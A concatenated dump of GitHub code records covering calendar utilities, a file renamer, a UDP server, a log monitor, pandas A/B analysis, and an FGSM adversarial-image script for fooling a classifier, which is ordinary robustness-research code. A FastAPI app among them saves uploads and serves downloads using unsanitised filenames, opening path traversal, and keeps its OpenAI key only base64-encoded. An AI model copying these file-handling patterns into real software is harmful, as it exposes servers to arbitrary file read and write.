a function to find the number of leap-years between (including both endpoints) two given years. \n \"\"\"\n assert year1>0\n assert year2>0\n assert type(year1)==int\n assert type(year2)==int\n assert year2>=year1\n c=0\n for y in range(year1,year2+1):\n d=number_of_days(y,2)\n if d==29:\n c+=1\n return c\ndef get_day_of_week(year,month,day):\n \"\"\"\n Write a function to find the string name (e.g., Monday, Tuesday) \n of the day of the week on a given month,day, and year.\n \"\"\"\n assert type(year)==int\n assert year>0\n assert type(month)==int\n assert 1<=month<=12\n assert type(day)==int\n days=number_of_days(year,month)\n assert day<=days\n d=calendar.weekday(year,month,day)\n if d==0:\n return 'Monday'\n elif d==1:\n return 'Tuesday'\n elif d==2:\n return 'Wednesday'\n elif d==3:\n return 'Thursday'\n elif d==4:\n return 'Friday'\n elif d==5:\n return 'Saturday'\n elif d==6:\n return 'Sunday'\n","repo_name":"agrawal-khushboo/ECE-143","sub_path":"calendar.py","file_name":"calendar.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29187185947","text":"# globモジュールのglob()関数を使用\r\n# globモジュールはディレクトリ内で指定した拡張子のファイルを返す\r\nimport glob\r\n\r\n# ファイル、ディレクトリのパス操作を行うためにosモジュールを使用\r\nimport os\r\n\r\n# input()関数を使用して新しいファイル名の入力\r\nenter_new_name = input(\"新しいファイル名の入力 ⇒ \")\r\n\r\n# --------------------------------------------------------------------------------------\r\n# .wav\r\n\r\n# 名前を変更するファイルを\"files\"と命名\r\nfiles = glob.glob(\"*.wav\")\r\n\r\n# enumerate()関数を使用して\"files\"にインデックス番号を設定して抽出\r\nfor i, old_name in enumerate(files):\r\n\r\n # 新しいファイル名の決定\r\n # 新しいファイル名に「_001」を始めとする番号をつけるために\"_{0:03d}\"と\"(i + 1)\"を追加\r\n new_name = enter_new_name + \"_wav_{0:03d}.wav\".format(i + 1)\r\n\r\n # ファイル名の変更\r\n os.rename(old_name, new_name)\r\n\r\n # 変更の表示\r\n print(old_name + \" ⇒ \" + new_name)\r\n\r\n# --------------------------------------------------------------------------------------\r\n# .mp3\r\n\r\nfiles = glob.glob(\"*.mp3\")\r\n\r\nfor i, old_name in enumerate(files):\r\n\r\n new_name = enter_new_name + \"_mp3_{0:03d}.mp3\".format(i + 1)\r\n\r\n os.rename(old_name, new_name)\r\n\r\n print(old_name + \" ⇒ \" + new_name)\r\n\r\n# --------------------------------------------------------------------------------------\r\n\r\n# 
enterキーでコマンドプロンプトを終了\r\ninput()\r\n","repo_name":"zozf/wav_mp3_change","sub_path":"wav_mp3_change.py","file_name":"wav_mp3_change.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"23138976475","text":"# Ep04 - APLICAÇÃO SERVIDORA COM UDP\r\n\r\nfrom socket import *\r\n\r\nservidor = \"127.0.0.1\" # localhost, 192.168.0.1, 10.0.0.1\r\nporta = 43210\r\n\r\nobj_socket = socket(AF_INET, SOCK_DGRAM)\r\nobj_socket.bind((servidor, porta))\r\nprint(\"Servidor pronto...\")\r\n\r\nwhile True:\r\n dados, origem = obj_socket.recvfrom(65535) # \"aplicação juiz\"\r\n\r\n print(\"Origem..............: \", origem)\r\n print(\"Dados recebidos.....: \", dados.decode()) # decodificar para string\r\n\r\n resposta = input(\"Digite a resposta: \")\r\n obj_socket.sendto(resposta.encode(), origem) # codificar para byte\r\n\r\nobj_socket.close()\r\n","repo_name":"fslaurafs/NanoCourses-FiapOn","sub_path":"Python/Python/Cap7/Protocolos de Comunicação e Python/Ep04_servidorUDP.py","file_name":"Ep04_servidorUDP.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"42770959642","text":"import copy\r\nimport models\r\nimport torch\r\nimport torch.optim as optim\r\nimport torch.nn as nn\r\nfrom torch.autograd import Variable\r\nimport numpy as np\r\nimport visualizations\r\n\r\ndef adversarial_optimizing_noise(model, org_img, true_label, target_label, regularization=\"l1\"):\r\n \"\"\"\r\n Creates an adversarial image by optimizing some noise, and add it to some original image.\r\n :param model: the trained model we want to fool.\r\n :param org_img: original image. to it we want to add the noise in order to create the adversarial image.\r\n :param true_label: the gold label of org_image.\r\n :param target_label: the label we want the trained model will mistakly classify it for the adversarial image.\r\n :param regularization: which norm to use in order to keep the noise as low as possibale.\r\n :return: noise - the noise we should add to original image in order to create an adversarial image\r\n pred_adversarial_label - the last label the trained model predicted to the noise image\r\n in the noise optimization iterations.\r\n \"\"\"\r\n\r\n # necessary pre-processing\r\n target_label = torch.LongTensor([target_label]) #\r\n org_img = org_img.unsqueeze(0) # add batch diminsion to org_image\r\n\r\n # Init value of noise and make its gradients updatable\r\n noise = nn.Parameter(data=torch.zeros(1, 3*32*32), requires_grad=True) # gray image\r\n #noise = nn.Parameter(data=torch.ones(1, 3*32*32), requires_grad=True) # white image\r\n #noise = nn.Parameter(data=torch.randn(1, 3*32*32), requires_grad=True) # gaussion noise\r\n\r\n # Check classification before modification\r\n pred_label = np.argmax(model(org_img).data.numpy())\r\n if true_label != pred_label:\r\n print(\"WARNING: IMAGE WAS NOT CLASSIFIED CORRECTLY\")\r\n\r\n criterion = nn.CrossEntropyLoss()\r\n optimizer = optim.SGD(params=[noise], lr=0.001, momentum=0.9)\r\n\r\n # Noise optimization\r\n iterations = 30000\r\n for iteration in range(iterations):\r\n\r\n optimizer.zero_grad()\r\n output = model(org_img + noise.view((1,3,32,32)))\r\n loss = criterion(output, target_label)\r\n\r\n if regularization == \"l1\":\r\n adv_loss = loss + torch.mean(torch.abs(noise))\r\n elif regularization == \"l2\":\r\n adv_loss = loss + torch.mean(torch.pow(noise, 2))\r\n else:\r\n 
adv_loss = loss\r\n\r\n adv_loss.backward()\r\n optimizer.step()\r\n\r\n # keep optimizing until we get that the predicted label is the target label\r\n pred_adversarial_label = np.argmax(model(org_img).data.numpy())\r\n if pred_adversarial_label == target_label:\r\n break\r\n\r\n if iteration == iterations-1:\r\n print(\"Warning: optimization loop ran for the maximum iterations. The result may not be correct\")\r\n\r\n return noise.view((3,32,32)).detach(), pred_adversarial_label\r\n\r\ndef FGSM(model, org_img, true_label):\r\n \"\"\"\r\n Creates an adversarial image by Fast Gradient Sign Method.\r\n :param model: the trained model.\r\n :param org_img: original image. to it we want to add the noise in order to create the adversarial image.\r\n :param true_label: the gold label of org_image.\r\n :return: adversarial_img,\r\n noise - the noise used to create the adversarial image\r\n y_pred_adversarial\r\n \"\"\"\r\n\r\n true_label = Variable(torch.LongTensor(np.array([true_label])), requires_grad=False)\r\n\r\n org_img = org_img.unsqueeze(0) # add batch diminsion\r\n org_img = Variable(org_img, requires_grad=True) # set org_img as parameter (cuz we need its gradient)\r\n\r\n # Classification before Adv\r\n pred_label = np.argmax(model(org_img).data.numpy())\r\n\r\n criterion = nn.CrossEntropyLoss()\r\n\r\n # Forward pass\r\n output = model(org_img)\r\n loss = criterion(output, true_label)\r\n loss.backward() # obtain gradients on org_img\r\n\r\n # Add perturbation\r\n epsilon = 0.01 #0.01 # 0.15\r\n x_grad = torch.sign(org_img.grad.data)\r\n noise = epsilon * x_grad\r\n adversarial_img = torch.clamp(org_img.data + noise, 0, 1)\r\n\r\n # Classification after optimization\r\n y_pred_adversarial = np.argmax(model(Variable(adversarial_img)).data.numpy())\r\n\r\n return adversarial_img.squeeze(0), noise.squeeze(0), y_pred_adversarial\r\n\r\n\r\ndef create_adversarial_img(path, org_img, true_label):\r\n \"\"\"\r\n Creates an adversarial image, and display it. We do it with 2 different methods.\r\n :param path: a path for the trained model.\r\n :param org_img: original image. 
to it we want to add the noise in order to create the adversarial image.\r\n :param true_label: the gold label of org_image.\r\n \"\"\"\r\n\r\n # Load trained model\r\n trained_net = models.SimpleModel()\r\n trained_net.load(path=path)\r\n trained_net.eval()\r\n\r\n # show original image\r\n visualizations.imshow(org_img)\r\n\r\n # Adversarial method 1\r\n\r\n # Copy the model so the original trained network wont change while we creating\r\n # the adversarial image\r\n model_copy = copy.deepcopy(trained_net)\r\n model_copy.eval()\r\n\r\n noise, adv_label = adversarial_optimizing_noise(model_copy, org_img, true_label=0, target_label=2, regularization=\"l1\")\r\n\r\n visualizations.imshow(noise) # show noise\r\n visualizations.imshow(org_img+noise) # show adversarial image\r\n out = trained_net((org_img+noise).unsqueeze(0))\r\n print(\"true label:\", true_label, \"adv_label:\", adv_label, \"trained_net label:\", out)\r\n\r\n\r\n # Adversarial method 2\r\n\r\n model_copy2 = copy.deepcopy(trained_net)\r\n adver_img, noise2, adv_label_2 = FGSM(model_copy2, org_img, true_label=0)\r\n\r\n visualizations.imshow(noise2) # show noise\r\n visualizations.imshow(adver_img) # show adversarial image\r\n out = trained_net(adver_img.unsqueeze(0))\r\n print(\"true label:\", true_label, \"adv_label:\", adv_label_2, \"trained_ned label:\", out)\r\n\r\n","repo_name":"OdedMous/Imbalanced-Dataset","sub_path":"adversarial.py","file_name":"adversarial.py","file_ext":"py","file_size_in_byte":5855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"3819089767","text":"import argparse\nimport csv\nimport logging\nimport time\nfrom collections import Counter, deque\nfrom typing import Generator, Optional\n\n\nclass AccessLogAggregate:\n def __init__(\n self,\n bucket_size_seconds: int,\n bucket: int,\n event: Optional[dict] = None,\n ):\n \"\"\"Create an aggregate over a time-grouping of other AccessLogAggregates\n\n An AccessLogAggregate can represent one or more log events. 
When it represents only one event,\n self.bucket_size_seconds is 0.\n\n :param bucket_size_seconds: The size of the time bucket represented by this aggregate\n :param bucket: The epoch timestamp of the beginning of the time bucket represented by this aggregate\n :param event: An event that, if given, initializes analysis counters for the aggregate\n \"\"\"\n self.bucket_size_seconds = bucket_size_seconds\n self.bucket = bucket\n # allow events to join this aggregate up to 30 seconds after its bucket has ended\n # accounts for out-of-order event arrival\n self.latest_time_before_close = self.bucket + self.bucket_size_seconds + 30\n self.top_sections = Counter()\n self.top_hosts = Counter()\n self.top_status_codes = Counter()\n self.availability = Counter()\n self.bytes = 0\n self.is_closed = False\n\n if event is not None:\n self.bucket_size_seconds = 0\n self.top_sections = Counter(\n [section_from_request(event.get(\"request\", \"GET / HTTP/1.0\"))]\n )\n self.top_hosts = Counter([event.get(\"remotehost\", \"foo\")])\n self.top_status_codes = Counter([event.get(\"status\", \"\")])\n self.availability = Counter(\n {\n \"total\": 1,\n \"successes\": int(event.get(\"status\") == \"200\"),\n \"failures\": int(event.get(\"status\") != \"200\"),\n }\n )\n self.bytes = int(event.get(\"bytes\", 0))\n\n def __repr__(self):\n return f\"\"\n\n def add(self, aggregate: \"AccessLogAggregate\"):\n \"\"\"Update analysis counters with information from the given aggregate\"\"\"\n # discard events for very old time windows that may appear due to out-of-order delivery\n if self.is_closed:\n logging.warning(\n \"Received event for already-closed alerting window %s\", self\n )\n return\n\n self.top_sections.update(\n {key: count for key, count in aggregate.top_sections.items()}\n )\n self.top_hosts.update(\n {key: count for key, count in aggregate.top_hosts.items()}\n )\n self.top_status_codes.update(\n {key: count for key, count in aggregate.top_status_codes.items()}\n )\n self.availability.update(aggregate.availability)\n self.bytes += aggregate.bytes\n\n def close(self):\n \"\"\"Mark this aggregate as closed and log its collected stats\"\"\"\n logging.info(\n \"Bucket=%s\\n\\tBucket size=%ss\\n\\tTop sections=%s\\n\\tTop hosts=%s\\n\\t\"\n \"Top status codes=%s\\n\\tAvailability=%s\\n\\tBytes=%s\\n\",\n self.bucket,\n self.bucket_size_seconds,\n self.top_sections,\n self.top_hosts,\n self.top_status_codes,\n self.availability,\n self.bytes,\n )\n self.is_closed = True\n\n\nclass AccessLogMonitor:\n def __init__(\n self,\n events: Generator[AccessLogAggregate, None, None],\n window_size_seconds: int,\n threshold: float,\n ):\n \"\"\"Create a monitor over AccessLogAggregates based on a sliding window\n\n :param events: The sequence of aggregates over which to perform monitoring\n :param window_size_seconds: The size of the sliding window used for analysis, in seconds\n :param threshold: The number of events per second on average over the monitoring window that will cause an alert\n to trigger\n \"\"\"\n self.window_size_seconds = 0\n self.min_window_size_seconds = window_size_seconds\n self.first_event_timestamp = 0\n self.last_event_timestamp = 0\n self.alert_threshold = threshold\n self.events = events\n self.window = []\n self.alert_triggered = False\n self.times_alert_triggered = 0\n\n def run(self):\n \"\"\"Monitor the sequence of aggregates\"\"\"\n for event in self.events:\n self.update_window(event)\n if self.window_size_seconds >= self.min_window_size_seconds:\n 
self.evaluate_alert_conditions(event.bucket)\n yield event\n\n def update_window(self, event: AccessLogAggregate):\n \"\"\"Add the given event to the analysis window\n\n Maintains a sliding window by expelling old events as new ones are added\n Tracks the size of the window in seconds\n \"\"\"\n # feels like this could be more efficient, but avoiding an iteration over the entire window\n # would require a guarantee that it's sorted by timestamp. possible future improvement.\n self.window = [\n e\n for e in self.window\n if e.bucket >= event.bucket - self.min_window_size_seconds\n ]\n self.window.append(event)\n self.first_event_timestamp = min(self.window[0].bucket, event.bucket)\n self.last_event_timestamp = max(self.window[-1].bucket, event.bucket)\n self.window_size_seconds = (\n self.last_event_timestamp - self.first_event_timestamp\n )\n\n # this only has one alert condition, but it would be straightforward to make it loop over multiple alert conditions\n def evaluate_alert_conditions(self, timestamp: int):\n \"\"\"Check the alert conditions and trigger alerts if applicable\n\n :param timestamp: The current time\n \"\"\"\n average_events_per_second = (\n round( # don't be quite so precise with the average calculation\n len(self.window) / (self.window_size_seconds or 1), 1\n )\n )\n if average_events_per_second > self.alert_threshold:\n self.trigger_alert(average_events_per_second, timestamp)\n return True\n else:\n self.resolve_alert(average_events_per_second, timestamp)\n return False\n\n def trigger_alert(self, average_events_per_second: float, current_time: int):\n if not self.alert_triggered:\n self.alert_triggered = True\n self.times_alert_triggered += 1\n logging.warning(\n \"High traffic generated an alert - hits = %.2f/s, triggered at %s\\n\",\n average_events_per_second,\n current_time,\n )\n logging.debug(\n \"window_size=%ss\\n\\tTotal events=%s\\n\\tavg_events_per_second=%f\\n\\t\"\n \"More than %s events per second\\n\",\n self.window_size_seconds,\n len(self.window),\n average_events_per_second,\n self.alert_threshold,\n )\n\n def resolve_alert(self, average_events_per_second: float, current_time: int):\n if self.alert_triggered:\n self.alert_triggered = False\n logging.warning(\n \"Reduced traffic resolved an alert - hits = %.2f/s, resolved at %s\\n\",\n average_events_per_second,\n current_time,\n )\n logging.debug(\n \"window_size=%ss\\n\\tTotal events=%s\\n\\tavg_events_per_second=%f\\n\\t\"\n \"Fewer than %s events per second\\n\",\n self.window_size_seconds,\n len(self.window),\n average_events_per_second,\n self.alert_threshold,\n )\n\n\ndef is_valid(event: dict[str, str]) -> bool:\n \"\"\"Return a boolean indicating whether the given event dictionary adheres to the schema this program expects\"\"\"\n if any(\n event[key] is None\n for key in (\n \"remotehost\",\n \"rfc931\",\n \"authuser\",\n \"date\",\n \"request\",\n \"status\",\n \"bytes\",\n )\n ):\n return False\n if None in event:\n return False\n return True\n\n\ndef read_access_log(\n input_file: str, timescale: float\n) -> Generator[AccessLogAggregate, None, None]:\n \"\"\"Generates AccessLogAggregates from a CSV HTTP access logfile\n\n Simulates delayed event arrival with time.sleep.\n Minimizes memory usage by lazily reading from disk.\n\n :param input_file: The relative path of the file from which to read access logs\n :param timescale: A multiplier applied to the sleep time between events. 
The sleep time defaults to the difference\n between the each pair of event timestamps in the log.\n \"\"\"\n current_timestamp = 0\n with open(input_file, newline=\"\") as csvfile:\n reader = csv.DictReader(csvfile, delimiter=\",\", quotechar='\"')\n for event in reader:\n if not is_valid(event):\n logging.warning(\"Malformed log entry encountered: %s\", event)\n continue\n time.sleep(\n (\n max(int(event.get(\"date\")) - current_timestamp, 0)\n if current_timestamp\n else 0\n )\n * timescale\n )\n current_timestamp = int(event.get(\"date\"))\n aggregate = AccessLogAggregate(0, current_timestamp, event)\n yield aggregate\n\n\ndef aggregate_stats(\n aggregates: Generator[AccessLogAggregate, None, None],\n bucket_size_seconds: int,\n) -> Generator:\n \"\"\"Collect and report statistics on time-bucketed aggregates over the generator\n\n This is a bare function as opposed to a class method because it doesn't have enough state to track\n to warrant the extra level of encapsulation.\n\n :param aggregates: The sequence over which to aggregate\n :param bucket_size_seconds: The size in seconds of the aggregation buckets to analyze\n \"\"\"\n all_aggregates: dict[int, AccessLogAggregate] = {}\n for agg in aggregates:\n bucket = agg.bucket - agg.bucket % bucket_size_seconds\n\n if bucket not in all_aggregates:\n all_aggregates[bucket] = AccessLogAggregate(bucket_size_seconds, bucket)\n all_aggregates[bucket].add(agg)\n\n # handle out-of-order arrival by closing aggregates that haven't gotten new data in a while\n for _, aggregate in all_aggregates.items():\n if (\n not aggregate.is_closed\n and agg.bucket > aggregate.latest_time_before_close\n and aggregate.bucket_size_seconds != 0\n ):\n aggregate.close()\n\n # free the memory occupied by closed aggregates\n all_aggregates = {k: v for k, v in all_aggregates.items() if not v.is_closed}\n\n yield agg\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Monitor and analyze a CSV HTTP access log. \"\n \"Simulates delayed event arrival with time.sleep.\"\n )\n parser.add_argument(\n \"input_file\",\n type=str,\n help=\"CSV file from which to read log\",\n )\n parser.add_argument(\n \"--alert-threshold\",\n \"-a\",\n type=float,\n default=10.0,\n help=\"Average requests per second during the monitoring window above which to alert. Defaults to 10.\",\n )\n parser.add_argument(\n \"--alert-window\",\n \"-w\",\n type=int,\n default=120,\n help=\"The size in seconds of the rolling window over which alerts are evaluated. Defaults to 120.\",\n )\n parser.add_argument(\n \"--analysis-bucket-size\",\n \"-b\",\n type=int,\n default=10,\n help=\"The size in seconds of the aggregation buckets in which alerts are analyzed. Defaults to 10.\",\n )\n parser.add_argument(\n \"--verbose\",\n \"-v\",\n action=\"store_true\",\n help=\"Enable verbose logging\",\n )\n parser.add_argument(\n \"--timescale\",\n \"-t\",\n type=float,\n default=0,\n help=\"How fast events should play back. Set between 0 and 1 for faster playback, above 1 for slower. \"\n \"Defaults to 0 (no playback delay)\",\n )\n return parser.parse_args()\n\n\ndef section_from_request(request: str) -> str:\n \"\"\"Given a request string from an access log, return the section name\"\"\"\n return f\"/{request.split()[1].split('/')[1]}\"\n\n\ndef exhaust(generator: Generator):\n \"\"\"Consume the given generator using a minimum of resources\"\"\"\n deque(generator, maxlen=0)\n\n\ndef main():\n \"\"\"Analyze and monitor an HTTP access log. 
See --help for more details.\"\"\"\n args = parse_args()\n logging.basicConfig(level=logging.DEBUG if args.verbose else logging.INFO)\n\n events = read_access_log(args.input_file, args.timescale)\n events = aggregate_stats(events, args.analysis_bucket_size)\n events = AccessLogMonitor(events, args.alert_window, args.alert_threshold).run()\n exhaust(events)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"emmettbutler/ctci","sub_path":"http_log_analysis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"70673312324","text":"import codecademylib\nimport pandas as pd\n\nad_clicks = pd.read_csv('ad_clicks.csv')\n\nby_source = ad_clicks.groupby('utm_source').user_id.count().reset_index()\n\nad_clicks['is_click'] = ~ad_clicks.ad_click_timestamp.isnull()\n\nclicks_by_source = ad_clicks.groupby(['utm_source', 'is_click']).user_id.count().reset_index()\n\nclicks_pivot = clicks_by_source.pivot(\n columns = 'is_click',\n index = 'utm_source',\n values = 'user_id'\n).reset_index()\n\nclicks_pivot['percent_clicked'] = clicks_pivot[True] / (clicks_pivot[True] + clicks_pivot[False])\n\na_b = ad_clicks.groupby(['experimental_group', 'is_click']).user_id.count().reset_index()\n\na_b_pivot = a_b.pivot( \n columns = 'is_click', \n index = 'experimental_group', \n values = 'user_id'\n).reset_index()\n\na_b_pivot['percentage'] = a_b_pivot[True] / (a_b_pivot[True] + a_b_pivot[False])\n\na_b_clicks = ad_clicks.groupby(['experimental_group', 'is_click']).user_id.count().reset_index()\n\na_clicks = ad_clicks[ad_clicks.experimental_group == 'A']\n\nb_clicks = ad_clicks[ad_clicks.experimental_group == 'B']\n\na_clicks_by_day = a_clicks.groupby(['day', 'is_click']).user_id.count().reset_index()\n\nb_clicks_by_day = b_clicks.groupby(['day', 'is_click']).user_id.count().reset_index()\n\na_clicks_pivot = a_clicks_by_day.pivot(\n columns = 'is_click',\n index = 'day',\n values = 'user_id'\n).reset_index()\n\nb_clicks_pivot = b_clicks_by_day.pivot(\n columns = 'is_click',\n index = 'day',\n values = 'user_id'\n).reset_index()\n\na_clicks_pivot['percentage'] = a_clicks_pivot[True] / (a_clicks_pivot[True] + a_clicks_pivot[False]) \n\nb_clicks_pivot['percentage'] = b_clicks_pivot[True] / (b_clicks_pivot[True] + b_clicks_pivot[False])\n\nprint(a_clicks_pivot)\nprint(b_clicks_pivot)","repo_name":"galangjati/data-science-codecademy","sub_path":"lesson_code/ab_testing/ab_testing.py","file_name":"ab_testing.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"4218377231","text":"import numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM\n\n# 1. 
데이터\na = np.array(range(1, 11)) # 1~ 10 : \nsize = 5\n\ndef split_x(seq, size):\n aaa = [] # 는 리스트\n for i in range(len(seq) - size + 1):\n subset = seq[i : (i+size)]\n aaa.append([item for item in subset]) # item for item in subset = 굳이 안넣고 subset 하면 간단.\n print(type(aaa))\n return np.array(aaa)\n\ndataset = split_x(a, size)\nprint(\"==============\")\nprint(dataset)\n\n# split_x(seq, size) 아래보면, dataset = split_x(a, size) 로 정의되었고\n# a = seq임을 확인,\n# for i in range(6) : range(6) = 0,1,2,3,4,5 = i\n# subset = seq[0:(0+5)] = seq[0:5] = 0 ~ 4 = 1,2,3,4,5\n# aaa.append([item]) = 1,2,3,4,5 = aaa\n# aaa = 12345, \n\n# 1:6 = 1~5 = 2,3,4,5,6\n# 2:7 = 2~6 = 3,4,5,6,7\n# 3:8 = 3~7 = 4,5,6,7,8\n# 4:9 = 4~8 = 5,6,7,8,9\n# 5:10 = 5~9 = 6,7,8,9,10\n\n\n# def split_x(seq, size):\n# aaa = []\n# for i in range(len(a) - size + 1):\n# subset = a[i : (i + size)]\n# print(subset)\n# # aaa.append([item for item in subset])\n# aaa.append(subset)\n# print(type(aaa))\n# return np.array(aaa) \n","repo_name":"khiljaekang/git-study","sub_path":"keras/keras39_split.py","file_name":"keras39_split.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"20001911917","text":"# -*- coding:utf8 -*-\n# File : test_nn_opr_imgproc.py\n# Author : Jiayuan Mao\n# Email : maojiayuan@gmail.com\n# Date : 10/10/17\n#\n# This file is part of TensorArtist.\n\nfrom tartist.nn import Env, opr as O\n\nimport numpy as np\nimport unittest\nimport functools\n\n\ndef wraps_new_env(func):\n @functools.wraps(func)\n def new_func(*args, **kwargs):\n with Env().as_default():\n return func(*args, **kwargs)\n return new_func\n\n\nclass TestNNOprImgproc(unittest.TestCase):\n @functools.wraps(np.allclose)\n def assertTensorClose(self, *args, **kwargs):\n return self.assertTrue(np.allclose(*args, **kwargs))\n\n @wraps_new_env\n def testCropCenter(self):\n a = O.placeholder('a', shape=(16, 17, 17, 3))\n b = O.crop_center(a, [15, 15])\n self.assertTupleEqual(b.static_shape, (16, 15, 15, 3))\n\n avar = np.random.normal(size=(16, 17, 17, 3))\n bvar = avar[:, 1:-1, 1:-1, :]\n self.assertTensorClose(b.eval(a=avar), bvar)\n\n @wraps_new_env\n def testCropLU(self):\n a = O.placeholder('a', shape=(16, 17, 17, 3))\n b = O.crop_lu(a, [15, 15])\n self.assertTupleEqual(b.static_shape, (16, 15, 15, 3))\n\n avar = np.random.normal(size=(16, 17, 17, 3))\n bvar = avar[:, :-2, :-2, :]\n self.assertTensorClose(b.eval(a=avar), bvar)\n\n @wraps_new_env\n def testPaddingCenter(self):\n a = O.placeholder('a', shape=(16, 15, 15, 3))\n b = O.pad_center(a, [17, 17])\n self.assertTupleEqual(b.static_shape, (16, 17, 17, 3))\n\n avar = np.random.normal(size=(16, 15, 15, 3))\n bvar = np.pad(avar, [[0, 0], [1, 1], [1, 1], [0, 0]], mode='constant')\n self.assertTensorClose(b.eval(a=avar), bvar)\n\n @wraps_new_env\n def testPaddingRB(self):\n a = O.placeholder('a', shape=(16, 15, 15, 3))\n b = O.pad_rb(a, [16, 16])\n self.assertTupleEqual(b.static_shape, (16, 16, 16, 3))\n\n avar = np.random.normal(size=(16, 15, 15, 3))\n bvar = np.pad(avar, [[0, 0], [0, 1], [0, 1], [0, 0]], mode='constant')\n self.assertTensorClose(b.eval(a=avar), bvar)\n\n @wraps_new_env\n def testPaddingRBMultiple(self):\n a = O.placeholder('a', shape=(16, 15, 15, 3))\n b = O.pad_rb_multiple_of(a, 8)\n self.assertTupleEqual(b.static_shape, (16, 16, 16, 3))\n\n avar = np.random.normal(size=(16, 15, 15, 3))\n bvar = np.pad(avar, [[0, 0], [0, 1], [0, 1], [0, 0]], mode='constant')\n 
self.assertTensorClose(b.eval(a=avar), bvar)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"vacancy/TensorArtist","sub_path":"tests/test_nn_opr_imgproc.py","file_name":"test_nn_opr_imgproc.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"99"} +{"seq_id":"14452022282","text":"# conding:utf-8\nimport base64\nimport os\nimport tempfile\nfrom random import randint\n\nimport openai\nimport qrcode\nimport requests\nfrom fastapi import APIRouter, Depends, Form, UploadFile\nfrom fastapi import Request\nfrom starlette import status\nfrom starlette.responses import RedirectResponse, FileResponse\nfrom starlette.templating import Jinja2Templates\n\nimport config.main\nfrom common.render_template import get_template\nfrom utils.ocr_util import OcrClient\n\n# main的分路由\ntemplates = Jinja2Templates(directory=\"router/templates\")\nmain_app = APIRouter()\n\n\n@main_app.get('/')\n@main_app.get('/index')\n@main_app.get('/qrcode/')\nasync def test(result: dict = Depends(get_template)):\n result['data'] = 'hello'\n return templates.TemplateResponse(\"index.html\", result)\n\n\n# @main_app.get(\"/favicon.ico\")\n# async def read_item():\n# return RedirectResponse('/static/favicon.ico')\n\n\n@main_app.get('/list/')\nasync def list_header(request: Request, result: dict = Depends(get_template)):\n result['session'] = request.headers\n return templates.TemplateResponse('list.html', result)\n\n\n@main_app.get('/wiki/')\nasync def wiki(dic: dict = Depends(get_template)):\n return templates.TemplateResponse(\"wiki.html\", dic)\n\n\n@main_app.post('/wiki/')\nasync def wiki(url: str = Form(), dic: dict = Depends(get_template)):\n key = config.main.AI_KEY\n r_key = base64.b64decode(key).decode(\"utf-8\")\n openai.api_key = r_key\n response = openai.Image.create(prompt=url, n=1, size=\"1024x1024\")\n image_url = response[\"data\"][0][\"url\"]\n dic[\"path\"] = image_url\n return templates.TemplateResponse(\"aipic.html\", dic)\n\n\n@main_app.post('/qrcode/')\nasync def qrcodelike(url: str = Form(), result: dict = Depends(get_template)):\n img_name = randint(1, 1000000)\n imge = qrcode.make(url)\n pa = 'static' + os.sep + 'qrcode' + os.sep + str(img_name) + \".png\"\n print(pa)\n imge.save(pa)\n result['img'] = img_name\n return templates.TemplateResponse('qrcode.html', result)\n\n\n@main_app.get('/upload/')\nasync def upload_get(dic: dict = Depends(get_template)):\n return templates.TemplateResponse('upload.html', dic)\n\n\n@main_app.post('/upload/')\nasync def upload_post(file: UploadFile):\n file_name = file.filename\n print(file_name)\n file_path = 'static' + os.sep + 'videos' + os.sep + file_name\n with open(file_path, \"wb\") as f:\n f.write(file.file.read())\n return RedirectResponse(url='/file/', status_code=status.HTTP_302_FOUND)\n\n\n@main_app.get('/file/')\nasync def file_list(dic=Depends(get_template)):\n li_file = []\n video_path = 'static' + os.sep + 'videos'\n for path, dir, file in os.walk(video_path):\n for i in file:\n li_file.append(i)\n dic['files'] = li_file\n return templates.TemplateResponse('file.html', dic)\n\n\n@main_app.get('/download/{filename}/')\ndef download_file(filename):\n video_path = 'static' + os.sep + 'qrcode' + os.sep + filename\n print(filename)\n respons = FileResponse(video_path, filename=filename)\n return respons\n\n\n@main_app.get('/downloadfile/{filename}/')\ndef download_file(filename):\n video_path = 'static' + os.sep + 'videos' + os.sep + filename\n print(filename)\n 
respons = FileResponse(video_path, filename=filename)\n return respons\n\n\n@main_app.get('/zhuang/')\ndef dazhuang(dic: dict = Depends(get_template)):\n return templates.TemplateResponse('zhuang.html', dic)\n\n\n@main_app.route('/ip/')\ndef get_ip():\n my_ip = requests.get('http://jsonip.com').json()['ip']\n return my_ip\n\n\n@main_app.get('/ocr/')\ndef ocr_get(dic: dict = Depends(get_template)):\n return templates.TemplateResponse('ocr.html', dic)\n\n\n@main_app.post('/ocr/')\ndef ocr_post(file: UploadFile,dic = Depends(get_template)):\n file_name = file.filename\n tempfile_path = tempfile.gettempdir()\n file_tmp_path = os.path.join(tempfile_path, file_name)\n with open(file_tmp_path, 'wb') as f:\n f.write(file.file.read())\n oc = OcrClient()\n dic['content'] = str(oc.simple_ocr(file_tmp_path))\n return templates.TemplateResponse(\"ocr.html\",dic)\n\n\n@main_app.get('/invoice/')\ndef invoice_get(dic: dict = Depends(get_template)):\n return templates.TemplateResponse('invoice.html', dic)\n\n\n@main_app.post('/invoice/')\ndef invoice_post(file: UploadFile):\n file_name = file.filename\n tempfile_path = tempfile.gettempdir()\n file_tmp_path = os.path.join(tempfile_path, file_name)\n with open(file_tmp_path, 'wb') as f:\n f.write(file.file.read())\n oc = 